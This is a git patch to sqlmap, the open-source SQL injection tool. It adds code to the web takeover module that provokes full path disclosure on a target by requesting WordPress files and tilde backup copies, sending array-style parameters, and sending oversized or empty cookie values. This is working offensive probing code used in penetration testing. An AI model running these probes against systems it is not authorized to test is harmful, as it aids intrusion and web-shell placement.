From cfe34f61b8dded73d228cfb5830edb118ea78a4f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 6 Apr 2017 11:33:59 +0200 Subject: [PATCH] Implementation for an Issue #1895 --- lib/core/settings.py | 2 +- lib/takeover/web.py | 57 ++++++++++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 60 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7323fbe9a..54fb3b4d1 100755 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.1.3.19" +VERSION = "1.1.4.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 5f5526068..8af9ffbdf 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -26,6 +26,7 @@ from lib.core.common import ntToPosixSlashes from lib.core.common import isTechniqueAvailable from lib.core.common import isWindowsDriveLetterPath from lib.core.common import normalizePath +from lib.core.common import parseFilePaths from lib.core.common import posixToNtSlashes from lib.core.common import randomInt from lib.core.common import randomStr @@ -38,8 +39,10 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import OS from lib.core.enums import PAYLOAD +from lib.core.enums import PLACE from lib.core.enums import WEB_API from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT @@ -196,6 +199,60 @@ class Web: self.webApi = choices[int(choice) - 1] break + if not kb.absFilePaths: + message = "do you want sqlmap to further try to " + message += "provoke the full path disclosure? [Y/n] " + getOutput = readInput(message, default="Y") + + if getOutput in ("y", "Y"): + headers = {} + been = {conf.url} + + for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I): + url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url) + if url not in been: + try: + page, _, _ = Request.getPage(url=url, raise404=False, silent=True) + parseFilePaths(page) + except: + pass + finally: + been.add(url) + + for place in (PLACE.GET, PLACE.POST): + if place in conf.parameters: + value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place]) + if "[]" in value: + page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + cookie = None + if PLACE.COOKIE in conf.parameters: + cookie = conf.parameters[PLACE.COOKIE] + elif headers and HTTP_HEADER.SET_COOKIE in headers: + cookie = headers[HTTP_HEADER.SET_COOKIE] + + if cookie: + value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) + if value != cookie: + page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + + value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie) + if value != cookie: + page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) + parseFilePaths(page) + directories = list(arrayizeValue(getManualDirectories())) directories.extend(getAutoDirectories()) directories = list(oset(directories)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 138c5074a..1a550e810 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -45,7 +45,7 @@ a8143dab9d3a27490f7d49b6b29ea530 lib/core/data.py d8e9250f3775119df07e9070eddccd16 lib/core/replication.py 785f86e3f963fa3798f84286a4e83ff2 lib/core/revision.py 40c80b28b3a5819b737a5a17d4565ae9 lib/core/session.py -17a78d5c8c8135e2d8b45f7ac4319618 lib/core/settings.py +50edc9861e7441371210f5fae263207c lib/core/settings.py d91291997d2bd2f6028aaf371bf1d3b6 lib/core/shell.py 2ad85c130cc5f2b3701ea85c2f6bbf20 lib/core/subprocessng.py afd0636d2e93c23f4f0a5c9b6023ea17 lib/core/target.py @@ -84,7 +84,7 @@ c6bc7961a186baabe0a9f5b7e0d8974b lib/takeover/icmpsh.py c90c993b020a6ae0f0e497fd84f37466 lib/takeover/metasploit.py ac541a0d38e4ecb4e41e97799a7235f4 lib/takeover/registry.py 4cd0322f22fbc26284cffa9f8f7545ef lib/takeover/udf.py -a610e0ef2fb8512604c2b6c081174850 lib/takeover/web.py +ab021269ad7f4d552025448ae08c51d0 lib/takeover/web.py e5a82481947e798d0c11f3acf3e9db60 lib/takeover/xp_cmdshell.py cae752650755c706272a45ae84519a4b lib/techniques/blind/inference.py 310efc965c862cfbd7b0da5150a5ad36 lib/techniques/blind/__init__.py